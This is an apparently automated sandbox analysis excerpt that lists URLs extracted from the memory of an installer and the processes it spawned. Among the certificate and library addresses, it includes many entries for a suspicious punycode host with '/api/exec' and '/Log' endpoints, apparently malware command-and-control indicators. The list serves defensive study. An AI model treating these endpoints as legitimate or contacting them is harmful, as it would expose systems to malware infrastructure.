                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: ast.exe, 0000000A.00000003.3020160381.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://restools.hanzify.org/
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ZZY
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/r
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt0
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: http://www.indyproject.org/
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.innosetup.com/
                          Source: aeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.000000000237E000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000003.00000003.2454108378.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ish
                          Source: aeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2075277683.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.0000000002385000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2079075667.0000000003250000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ishAbout
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: http://www.openssl.org/)
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.remobjects.com/ps
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: ast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/V
                          Source: ast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
                          Source: ast.exe, ast.exe, 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                          Source: ast.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/
                          Source: ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/AstClnog
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/ING=Defaui
                          Source: ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/Log
                          Source: ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D67000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178152497.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                          Source: ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44300
                          Source: ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44302
                          Source: ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335
                          Source: ast.exe, 0000000A.00000002.3348750365.0000000003382000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335-
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3019905898.0000000005D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335...
                          Source: ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335......
                          Source: ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/api/exec
                          Source: ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/templatep
                          Source: ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335i:443y
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44359
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 
0000000A.00000003.3224217384.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4438
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4439
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44396
                          Source: ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443:V
                          Source: ast.exe, 0000000A.00000002.3356437009.0000000004418000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443AUB
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443CBOs
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087444966.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178707233.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3363176686.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3338883178.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443JV
                          Source: ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443K
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443NUGx
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443OW
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Os
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443U
                          Source: ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443VV
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443VW~x
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443_Vpy
                          Source: ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 
0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443f
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3342382296.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g
                          Source: ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g8P
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g~
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443h
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443i
                          Source: ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443iVfy
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103917817.0000000005D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443k
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443l~
                          Source: ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443mUbx
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443n
                          Source: ast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443rV
                          Source: ast.exe, 0000000A.00000003.3103917817.0000000005D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443t
                          Source: ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ts
                          Source: ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443uV
                          Source: ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443uin
                          Source: ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443vU
                          Source: ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443w
                          Source: ast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiCY
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiIZ
                          Source: ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiVZ
